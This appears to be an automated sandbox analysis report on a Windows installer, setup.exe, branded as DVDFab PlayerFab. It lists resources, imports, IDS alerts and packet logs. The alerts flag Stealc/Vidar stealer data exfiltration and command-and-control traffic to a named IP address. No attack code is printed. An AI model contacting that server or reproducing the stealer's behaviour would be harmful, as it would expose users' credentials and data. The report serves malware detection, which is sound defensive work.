RT_BITMAP	0x43b350	0x46e	Device independent bitmap graphic, 17 x 21 x 24, image size 1094, resolution 2834 x 2834 px/m	Chinese	China	0.0582010582010582
RT_BITMAP	0x43b7c0	0x46e	Device independent bitmap graphic, 17 x 21 x 24, image size 1094, resolution 2834 x 2834 px/m	Chinese	China	0.25573192239858905
RT_BITMAP	0x43bc30	0x46e	Device independent bitmap graphic, 17 x 21 x 24, image size 1094, resolution 2834 x 2834 px/m	Chinese	China	0.22134038800705466
RT_BITMAP	0x43c0a0	0x46e	Device independent bitmap graphic, 17 x 21 x 24, image size 1094, resolution 2834 x 2834 px/m	Chinese	China	0.21781305114638447
RT_BITMAP	0x43c510	0x46e	Device independent bitmap graphic, 17 x 21 x 24, image size 1094, resolution 2834 x 2834 px/m	Chinese	China	0.20811287477954143
RT_BITMAP	0x43c980	0x776	Device independent bitmap graphic, 622 x 1 x 24, image size 1870, resolution 2834 x 2834 px/m	Chinese	China	0.02617801047120419
RT_BITMAP	0x43d0f8	0x393ba	Device independent bitmap graphic, 342 x 228 x 24, image size 234386, resolution 2834 x 2834 px/m	Chinese	China	0.03834472285497342
RT_BITMAP	0x4764b4	0x46ca	Device independent bitmap graphic, 602 x 10 x 24, image size 18082, resolution 2834 x 2834 px/m	Chinese	China	0.07245337159253945
RT_BITMAP	0x47ab80	0x46ca	Device independent bitmap graphic, 602 x 10 x 24, image size 18082, resolution 2834 x 2834 px/m	Chinese	China	0.0073943273369385274
RT_BITMAP	0x47f24c	0x292	Device independent bitmap graphic, 14 x 14 x 24, image size 618, resolution 2834 x 2834 px/m	Chinese	China	0.2553191489361702
RT_BITMAP	0x47f4e0	0x292	Device independent bitmap graphic, 14 x 14 x 24, image size 618, resolution 2834 x 2834 px/m	Chinese	China	0.2553191489361702
RT_BITMAP	0x47f774	0x292	Device independent bitmap graphic, 14 x 14 x 24, image size 618, resolution 2834 x 2834 px/m	Chinese	China	0.21428571428571427
RT_BITMAP	0x47fa08	0x292	Device independent bitmap graphic, 14 x 14 x 24, image size 618, resolution 2834 x 2834 px/m	Chinese	China	0.21428571428571427
RT_BITMAP	0x47fc9c	0x25aa	Device independent bitmap graphic, 100 x 32 x 24, image size 9602, resolution 2834 x 2834 px/m	Chinese	China	0.01109728272142709
RT_BITMAP	0x482248	0x25aa	Device independent bitmap graphic, 100 x 32 x 24, image size 9602, resolution 2834 x 2834 px/m	Chinese	China	0.010889856876166771
RT_BITMAP	0x4847f4	0x25aa	Device independent bitmap graphic, 100 x 32 x 24, image size 9602, resolution 2834 x 2834 px/m	Chinese	China	0.01120099564405725
RT_BITMAP	0x486da0	0x142	Device independent bitmap graphic, 13 x 7 x 24, image size 282, resolution 2834 x 2834 px/m	Chinese	China	0.5093167701863354
RT_BITMAP	0x486ee4	0x142	Device independent bitmap graphic, 13 x 7 x 24, image size 282, resolution 2834 x 2834 px/m	Chinese	China	0.5124223602484472
RT_BITMAP	0x487028	0x142	Device independent bitmap graphic, 13 x 7 x 24, image size 282, resolution 2834 x 2834 px/m	Chinese	China	0.5217391304347826
RT_BITMAP	0x48716c	0x142	Device independent bitmap graphic, 13 x 7 x 24, image size 282, resolution 2834 x 2834 px/m	Chinese	China	0.5341614906832298
RT_BITMAP	0x4872b0	0xaba	Device independent bitmap graphic, 26 x 26 x 32, image size 2706, resolution 2834 x 2834 px/m	Chinese	China	0.08120903131828114
RT_BITMAP	0x487d6c	0xaba	Device independent bitmap graphic, 26 x 26 x 32, image size 2706, resolution 2834 x 2834 px/m	Chinese	China	0.07683903860160234
RT_BITMAP	0x488828	0xaba	Device independent bitmap graphic, 26 x 26 x 32, image size 2706, resolution 2834 x 2834 px/m	Chinese	China	0.07283321194464676
RT_BITMAP	0x4892e4	0x25aa	Device independent bitmap graphic, 100 x 32 x 24, image size 9602, resolution 2834 x 2834 px/m	Chinese	China	0.010889856876166771
RT_BITMAP	0x48b890	0xaf2	Device independent bitmap graphic, 30 x 30 x 24, image size 2762, resolution 2834 x 2834 px/m	Chinese	China	0.16488222698072805
RT_BITMAP	0x48c384	0x25aa	Device independent bitmap graphic, 100 x 32 x 24, image size 9602, resolution 2834 x 2834 px/m	Chinese	China	0.01120099564405725
RT_BITMAP	0x48e930	0x25aa	Device independent bitmap graphic, 100 x 32 x 24, image size 9602, resolution 2834 x 2834 px/m	Chinese	China	0.01109728272142709
RT_BITMAP	0x490edc	0x46e	Device independent bitmap graphic, 17 x 21 x 24, image size 1094, resolution 2834 x 2834 px/m	Chinese	China	0.06701940035273368
RT_BITMAP	0x49134c	0x46e	Device independent bitmap graphic, 17 x 21 x 24, image size 1094, resolution 2834 x 2834 px/m	Chinese	China	0.07407407407407407
RT_BITMAP	0x4917bc	0x46e	Device independent bitmap graphic, 17 x 21 x 24, image size 1094, resolution 2834 x 2834 px/m	Chinese	China	0.07407407407407407
RT_BITMAP	0x491c2c	0x47142	Device independent bitmap graphic, 311 x 311 x 24, image size 291098, resolution 2834 x 2834 px/m	Chinese	China	0.0292919508961386
RT_BITMAP	0x4d8d70	0x47142	Device independent bitmap graphic, 311 x 311 x 24, image size 291098, resolution 2834 x 2834 px/m	Chinese	China	0.13135008140469467
RT_BITMAP	0x51feb4	0x126	Device independent bitmap graphic, 9 x 9 x 24, image size 254, resolution 2834 x 2834 px/m	Chinese	China	0.3231292517006803
RT_BITMAP	0x51ffdc	0xb8b66	Device independent bitmap graphic, 622 x 405 x 24, image size 756542, resolution 2834 x 2834 px/m	Chinese	China	0.1887845600344708
RT_BITMAP	0x5d8b44	0x65ea	Device independent bitmap graphic, 197 x 44 x 24, image size 26050, resolution 2834 x 2834 px/m	Chinese	China	0.11264852433882713
RT_BITMAP	0x5df130	0x65ea	Device independent bitmap graphic, 197 x 44 x 24, image size 26050, resolution 2834 x 2834 px/m	Chinese	China	0.2443848217707934
RT_BITMAP	0x5e571c	0x47142	Device independent bitmap graphic, 311 x 311 x 24, image size 291098, resolution 2834 x 2834 px/m	Chinese	China	0.10012090486298594
RT_BITMAP	0x62c860	0xb8b66	Device independent bitmap graphic, 622 x 405 x 24, image size 756542, resolution 2834 x 2834 px/m	Chinese	China	0.0032858302206502403
RT_BITMAP	0x6e53c8	0x1fda	Device independent bitmap graphic, 52 x 52 x 24, image size 8114, resolution 2834 x 2834 px/m	Chinese	China	0.07787588913416728
RT_ICON	0x6e73a4	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	English	United States	0.08943101458709353
RT_ICON	0x7293cc	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.13927008162782445
RT_ICON	0x739bf4	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.18890582299768763
RT_ICON	0x74309c	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.21498582900330657
RT_ICON	0x7472c4	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.28184647302904564
RT_ICON	0x74986c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.33630393996247654
RT_ICON	0x74a914	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.4778368794326241
RT_ICON	0x74ad7c	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	English	United States	0.08943101458709353
RT_ICON	0x78cda4	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.13927008162782445
RT_ICON	0x79d5cc	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.18890582299768763
RT_ICON	0x7a6a74	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.21498582900330657
RT_ICON	0x7aac9c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.28184647302904564
RT_ICON	0x7ad244	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.33630393996247654
RT_ICON	0x7ae2ec	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.4778368794326241
RT_MENU	0x7ae754	0x4a	data	English	United States	0.8648648648648649
RT_DIALOG	0x7ae7a0	0x40	data	Chinese	China	0.8125
RT_DIALOG	0x7ae7e0	0x90	data	Chinese	China	0.6597222222222222
RT_DIALOG	0x7ae870	0x40	data	Chinese	China	0.8125
RT_DIALOG	0x7ae8b0	0x11e	data	Chinese	China	0.6118881118881119
RT_STRING	0x7ae9d0	0x4c	data	English	United States	0.7105263157894737
RT_STRING	0x7aea1c	0x30	data	English	United States	0.5625
RT_ACCELERATOR	0x7aea4c	0x10	data	English	United States	1.25
RT_GROUP_ICON	0x7aea5c	0x68	data	English	United States	0.75
RT_GROUP_ICON	0x7aeac4	0x68	data	English	United States	0.7403846153846154
RT_VERSION	0x7aeb2c	0x300	data	Chinese	China	0.46484375
RT_MANIFEST	0x7aee2c	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
WS2_32.dll	ioctlsocket, gethostname, htonl, getservbyname, WSAEnumNetworkEvents, WSACreateEvent, WSAGetLastError, gethostbyname, sendto, recvfrom, inet_ntoa, inet_addr, WSACleanup, shutdown, listen, WSAStartup, accept, freeaddrinfo, getaddrinfo, WSAIoctl, socket, setsockopt, ntohs, htons, getsockopt, getsockname, getpeername, connect, closesocket, bind, send, recv, WSASetLastError, select, __WSAFDIsSet, WSAWaitForMultipleEvents, WSASocketW, WSAEventSelect
WLDAP32.dll
KERNEL32.dll	GetTimeZoneInformation, FreeEnvironmentStringsW, GetSystemDefaultLangID, RaiseException, GetLastError, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, DecodePointer, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, GetProcessHeap, DeleteFileW, Sleep, GetExitCodeProcess, CloseHandle, TerminateProcess, GetTickCount, GetPrivateProfileIntW, WaitForSingleObject, LoadLibraryA, GetProcAddress, FreeLibrary, FindFirstFileW, FindNextFileW, GetFileAttributesW, SetFileAttributesW, WideCharToMultiByte, OpenFileMappingW, MapViewOfFile, CreateFileMappingW, UnmapViewOfFile, MulDiv, SetUnhandledExceptionFilter, OutputDebugStringW, GetPrivateProfileStringW, MoveFileExW, OutputDebugStringA, DeleteFileA, GetCommandLineW, CreateDirectoryW, LoadLibraryW, VirtualAlloc, VirtualFree, GetModuleHandleA, GetVersionExA, InitializeCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, CreateEventA, CreateSemaphoreA, AreFileApisANSI, MultiByteToWideChar, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, LocalFree, FormatMessageA, FormatMessageW, GetCurrentProcessId, GetCurrentThreadId, SetLastError, SetFileTime, GetModuleHandleW, GetSystemDirectoryA, GetTempPathA, GetTempPathW, GetWindowsDirectoryA, SetCurrentDirectoryA, SetCurrentDirectoryW, GetCurrentDirectoryA, GetCurrentDirectoryW, CreateDirectoryA, RemoveDirectoryA, RemoveDirectoryW, CreateFileW, SetFileAttributesA, MoveFileA, MoveFileW, FindClose, GetLogicalDriveStringsA, GetLogicalDriveStringsW, GetFileAttributesA, FindFirstFileA, FindNextFileA, ReadConsoleW, WriteFile, SetWaitableTimer, DeviceIoControl, SetEndOfFile, SetFilePointer, CreateFileA, GetFileInformationByHandle, GetDriveTypeA, GetDriveTypeW, GetFileAttributesExW, GetDiskFreeSpaceW, GetVolumeInformationA, GetCurrentProcess, CompareFileTime, FileTimeToSystemTime, GlobalMemoryStatus, GetSystemInfo, GetSystemTimeAsFileTime, FileTimeToDosDateTime, DosDateTimeToFileTime, LocalFileTimeToFileTime, FileTimeToLocalFileTime, WaitForMultipleObjects, GetStdHandle, QueryPerformanceCounter, SetProcessAffinityMask, OpenEventA, OpenFileMappingA, GetProcessTimes, SetConsoleCtrlHandler, SetFileApisToOEM, GetConsoleScreenBufferInfo, GetConsoleMode, SetConsoleMode, OpenProcess, lstrcmpiW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, LockResource, LoadResource, SizeofResource, FindResourceW, GetDiskFreeSpaceExA, GetVersionExW, GetLocaleInfoA, ReleaseMutex, CreateMutexW, GetLocalTime, GetNativeSystemInfo, SystemTimeToFileTime, InitializeCriticalSectionEx, SleepEx, GetTickCount64, WaitForSingleObjectEx, ExpandEnvironmentStringsA, GetFileType, GetTimeFormatW, VerSetConditionMask, VerifyVersionInfoA, FlushConsoleInputBuffer, GetSystemTime, TlsAlloc, GetModuleHandleExW, ExitProcess, ReadConsoleInputA, SetFilePointerEx, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, SystemTimeToTzSpecificLocalTime, ExitThread, CreateThread, GetStringTypeW, EncodePointer, AllocConsole, SetConsoleTitleA, FreeConsole, lstrlenA, IsDBCSLeadByte, GlobalUnlock, GlobalLock, CreateProcessA, MoveFileExA, CopyFileA, QueryDosDeviceA, GetShortPathNameA, CompareStringW, LCMapStringW, GetFileSize, SetStdHandle, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetCurrentThread, IsValidCodePage, GetACP, GetOEMCP, FindFirstFileExW, FlushFileBuffers, GetConsoleCP, GetEnvironmentStringsW, ResumeThread, CreateWaitableTimerA, TlsGetValue, TlsSetValue, TlsFree, VirtualQuery, GetThreadTimes, InitializeSListHead, WriteConsoleW, SetEnvironmentVariableA, GetFullPathNameW, WaitForMultipleObjectsEx, GetDiskFreeSpaceA, GetCPInfo, UnhandledExceptionFilter, GetStartupInfoW, GetDateFormatW, ReadFile, PeekNamedPipe
USER32.dll	CharUpperA, CharUpperW, GetWindowRgn, DestroyWindow, CharPrevExA, ClientToScreen, InvalidateRect, ExitWindowsEx, PostMessageW, SetWindowLongW, GetDesktopWindow, RegisterClassExW, LoadCursorW, DefWindowProcW, FindWindowW, GetWindowThreadProcessId, MessageBoxW, EndDialog, OffsetRect, LoadStringA, SendMessageA, LoadIconW, SetWindowTextA, CreateWindowExW, MoveWindow, EnableWindow, wsprintfW, DrawTextA, ReleaseDC, DrawTextW, FillRect, GetClientRect, GetDC, DialogBoxParamW, LoadStringW, SetWindowPos, GetSystemMetrics, GetWindowRect, CreateDialogParamW, ShowWindow, SetWindowTextW, SendMessageW, GetDlgItem, KillTimer, SetTimer, LoadBitmapW, OpenDesktopA, EnumDesktopWindows, CloseDesktop, PostMessageA, IsWindowVisible, OpenClipboard, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, GetForegroundWindow, SystemParametersInfoA, CharNextA, SetCapture, ReleaseCapture, GetWindowTextW, GetProcessWindowStation, GetUserObjectInformationW, MessageBoxA, GetWindowLongW
GDI32.dll	GetTextExtentPointW, PtInRegion, CreateRectRgn, CreateDIBSection, CreateFontIndirectW, GetDeviceCaps, BitBlt, SetTextColor, SetBkMode, CreateSolidBrush, SelectObject, CreateCompatibleDC, SetBitmapBits, CreateCompatibleBitmap, GetBitmapBits, GetObjectW, DeleteObject, DeleteDC
ADVAPI32.dll	RegEnumKeyA, RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegDeleteKeyA, RegCloseKey, CheckTokenMembership, DuplicateTokenEx, CryptReleaseContext, CryptGenRandom, CryptAcquireContextA, RegSetValueA, RegQueryValueA, RegEnumKeyExA, RegDeleteValueA, RegCreateKeyA, LookupPrivilegeValueW, FreeSid, AllocateAndInitializeSid, GetFileSecurityW, LookupPrivilegeValueA, SetFileSecurityW, AdjustTokenPrivileges, OpenProcessToken, RegEnumValueA, RegOpenKeyA, RegQueryInfoKeyA, DeregisterEventSource, RegisterEventSourceA, ReportEventA, RegCreateKeyExA
SHELL32.dll	ShellExecuteExA, SHGetPathFromIDListA, ShellExecuteW, ShellExecuteA, SHGetSpecialFolderLocation, SHGetFolderPathW, SHGetPathFromIDListW, SHBrowseForFolderW, ShellExecuteExW, SHGetSpecialFolderPathW
ole32.dll	CoInitializeEx, CoUninitialize, CoSetProxyBlanket, CoCreateGuid, CoCreateInstance, CoTaskMemFree, CoInitializeSecurity, CoInitialize
OLEAUT32.dll	SysFreeString, VariantCopy, VariantClear, SysAllocStringLen, SysAllocString, SysStringLen
POWRPROF.dll	SetSuspendState
VERSION.dll	GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
SHLWAPI.dll	PathFileExistsA, StrCpyNW, StrChrW, StrCmpW, PathFileExistsW, StrCpyW, PathAppendW, PathIsDirectoryW, PathRemoveFileSpecW, PathAppendA, StrRChrW, StrCatW
NETAPI32.dll	NetApiBufferFree, NetWkstaGetInfo
PSAPI.DLL	GetModuleFileNameExW
IPHLPAPI.DLL	GetAdaptersInfo
dbghelp.dll	MiniDumpWriteDump

Version Infos

Description	Data
CompanyName	PlayerFab
FileDescription	PlayerFab
FileVersion	1.0.0.0
InternalName	setup.exe
LegalCopyright	Copyright (c)2003-2024 DVDFab.cn. All Rights Reserved.
OriginalFilename	setup.exe
ProductName	DVDFab Software Inc.
ProductVersion	1.0.0.0
Translation	0x0804 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-15T08:29:17.393793+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49725	95.217.30.53	443	TCP
2025-03-15T08:29:18.724812+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49728	95.217.30.53	443	TCP
2025-03-15T08:29:19.471355+0100	2859378	ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2	1	192.168.2.4	49728	95.217.30.53	443	TCP
2025-03-15T08:29:20.149917+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49729	95.217.30.53	443	TCP
2025-03-15T08:29:20.893740+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1	1	192.168.2.4	49729	95.217.30.53	443	TCP
2025-03-15T08:29:21.567276+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49730	95.217.30.53	443	TCP
2025-03-15T08:29:22.306742+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	95.217.30.53	443	192.168.2.4	49730	TCP
2025-03-15T08:29:22.983223+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49732	95.217.30.53	443	TCP
2025-03-15T08:29:23.723002+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	95.217.30.53	443	192.168.2.4	49732	TCP
2025-03-15T08:29:24.445768+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49734	95.217.30.53	443	TCP
2025-03-15T08:29:25.125770+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49734	95.217.30.53	443	TCP
2025-03-15T08:29:25.729984+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49735	95.217.30.53	443	TCP
2025-03-15T08:29:26.535097+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49735	95.217.30.53	443	TCP
2025-03-15T08:29:26.813803+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49736	95.217.30.53	443	TCP
2025-03-15T08:29:26.816976+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49736	95.217.30.53	443	TCP
2025-03-15T08:29:26.816976+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49736	95.217.30.53	443	TCP
2025-03-15T08:29:27.872966+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49737	95.217.30.53	443	TCP
2025-03-15T08:29:27.875680+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49737	95.217.30.53	443	TCP
2025-03-15T08:29:27.875680+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49737	95.217.30.53	443	TCP
2025-03-15T08:29:29.890611+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49738	95.217.30.53	443	TCP
2025-03-15T08:29:29.893630+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49738	95.217.30.53	443	TCP
2025-03-15T08:29:29.893630+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49738	95.217.30.53	443	TCP
2025-03-15T08:29:37.992816+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49765	95.217.30.53	443	TCP
2025-03-15T08:29:38.816903+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49765	95.217.30.53	443	TCP
2025-03-15T08:29:39.026294+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49766	95.217.30.53	443	TCP
2025-03-15T08:29:39.839379+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49766	95.217.30.53	443	TCP
2025-03-15T08:29:40.040881+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49767	95.217.30.53	443	TCP
2025-03-15T08:29:40.043577+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49767	95.217.30.53	443	TCP
2025-03-15T08:29:40.043577+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49767	95.217.30.53	443	TCP
2025-03-15T08:29:41.062973+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49768	95.217.30.53	443	TCP
2025-03-15T08:29:41.065883+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49768	95.217.30.53	443	TCP
2025-03-15T08:29:41.065883+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49768	95.217.30.53	443	TCP
2025-03-15T08:29:42.090212+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49769	95.217.30.53	443	TCP
2025-03-15T08:29:42.098410+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49769	95.217.30.53	443	TCP
2025-03-15T08:29:42.098410+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49769	95.217.30.53	443	TCP
2025-03-15T08:29:43.261457+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49770	95.217.30.53	443	TCP
2025-03-15T08:29:43.264024+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49770	95.217.30.53	443	TCP
2025-03-15T08:29:43.264024+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49770	95.217.30.53	443	TCP
2025-03-15T08:29:44.222882+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49771	95.217.30.53	443	TCP
2025-03-15T08:29:44.225875+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49771	95.217.30.53	443	TCP
2025-03-15T08:29:44.225875+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49771	95.217.30.53	443	TCP
2025-03-15T08:29:46.564225+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49772	95.217.30.53	443	TCP
2025-03-15T08:29:46.574343+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49772	95.217.30.53	443	TCP
2025-03-15T08:29:46.574343+0100	2859636	ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)	1	192.168.2.4	49772	95.217.30.53	443	TCP
2025-03-15T08:29:47.281969+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49773	95.217.30.53	443	TCP
2025-03-15T08:29:48.922304+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49774	95.217.30.53	443	TCP
2025-03-15T08:29:50.389076+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49775	95.217.30.53	443	TCP
2025-03-15T08:29:51.119420+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49775	95.217.30.53	443	TCP
2025-03-15T08:29:55.507903+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49776	95.217.30.53	443	TCP
2025-03-15T08:29:55.510492+0100	2059331	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2	1	192.168.2.4	49776	95.217.30.53	443	TCP
2025-03-15T08:29:57.490527+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49777	95.217.30.53	443	TCP
2025-03-15T08:29:58.948311+0100	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49778	95.217.30.53	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 15, 2025 08:29:09.958324909 CET	49671	443	192.168.2.4	204.79.197.203
Mar 15, 2025 08:29:10.271872997 CET	49671	443	192.168.2.4	204.79.197.203
Mar 15, 2025 08:29:10.879584074 CET	49671	443	192.168.2.4	204.79.197.203
Mar 15, 2025 08:29:12.082750082 CET	49671	443	192.168.2.4	204.79.197.203
Mar 15, 2025 08:29:14.488995075 CET	49671	443	192.168.2.4	204.79.197.203
Mar 15, 2025 08:29:16.473670959 CET	49725	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:16.473746061 CET	443	49725	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:16.473845005 CET	49725	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:16.485526085 CET	49725	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:16.485544920 CET	443	49725	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:17.393682957 CET	443	49725	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:17.393793106 CET	49725	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:17.448668957 CET	49725	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:17.448719978 CET	443	49725	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:17.449016094 CET	443	49725	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:17.449078083 CET	49725	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:17.452739954 CET	49725	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:17.500329971 CET	443	49725	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:18.037648916 CET	443	49725	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:18.037704945 CET	443	49725	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:18.037719965 CET	49725	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:18.037792921 CET	49725	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:18.041821957 CET	49725	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:18.041841984 CET	443	49725	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:18.053455114 CET	49728	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:18.053481102 CET	443	49728	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:18.053555012 CET	49728	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:18.053864002 CET	49728	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:18.053877115 CET	443	49728	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:18.723824978 CET	49678	443	192.168.2.4	20.189.173.27
Mar 15, 2025 08:29:18.724631071 CET	443	49728	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:18.724812031 CET	49728	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:18.726850986 CET	49728	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:18.726850986 CET	49728	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:18.726859093 CET	443	49728	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:18.726871967 CET	443	49728	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:19.035926104 CET	49678	443	192.168.2.4	20.189.173.27
Mar 15, 2025 08:29:19.301538944 CET	49671	443	192.168.2.4	204.79.197.203
Mar 15, 2025 08:29:19.471368074 CET	443	49728	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:19.471432924 CET	443	49728	95.217.30.53	192.168.2.4
Mar 15, 2025 08:29:19.471462965 CET	49728	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:19.471676111 CET	49728	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:19.471772909 CET	49728	443	192.168.2.4	95.217.30.53
Mar 15, 2025 08:29:19.471781969 CET	443	49728	95.217.30.53	192.168.2.4
